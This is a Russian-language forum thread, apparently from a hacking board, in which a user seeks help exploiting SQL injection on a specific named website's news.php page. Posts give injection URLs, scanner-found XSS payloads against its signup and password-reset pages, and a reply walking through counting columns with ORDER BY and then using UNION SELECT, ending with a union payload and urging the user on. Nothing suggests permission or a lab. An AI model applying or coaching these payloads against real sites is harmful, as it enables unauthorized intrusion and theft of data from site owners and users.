Помогите с SQL injection, pls
 

Вообщем нашел один сайтец, там можно провести SQL инъекцию, но у меня не совсем как-то удачно получается :( Может кто-нибудь поможет? Заранее thanks :)

http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0
http://atmsurf.com:80/news.php?ocd=view&id='

пробовал много вариантов, но никак не получается.

Кстати сканер выдал еще это:

http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>

мож там фильтруется все -- вот и не вышло ???

Може быть, поэтому я решил спросить вас. Можно, что либо сделал там или безнадежно :)

Acunetix Web Vul рулит ? =)
кол-во столбцов подобрал хоть? влом просто )
или не можешь имена подобрать ?

Ага, хороший сканер=)
Там, кол-во столбцов пробовал подгонять, но постоянно пишут ошибку, хотя там их не много это я знаю.
А, ошибку постоянно выдает :(

опиши способ "подгона" )

Ну, допустим

http://atmsurf.com/news.php?ocd=view&id=1'+union+select+null,null/*
так выдает ошибку.
http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/*
так нет.
Пробовал еще несколько вариантов.

эм а ковычка тут нафиг не нужна :)
поэтому
http://atmsurf.com/news.php?ocd=view&id=1/*
потом щитаеш кол-во столбцов, с помощью order by
http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
если выдало ошибку, то столбцов меньше, чем 10
подбираеш пока не узнаеш кол-во столбцов, потом собственно юзаеш union

зы уже сто раз расписали, как это делать :)

А если и 100 и 200 вписываешь?
И ошибку не выдает.
Полей, то всяко 100 не может быть :)

_http://atmsurf.com:80/news.php?ocd=view&id=1'+union+select+null,null,nul l,null,null,null,null,null/*

и в чем проблема ? =) валяй даьше..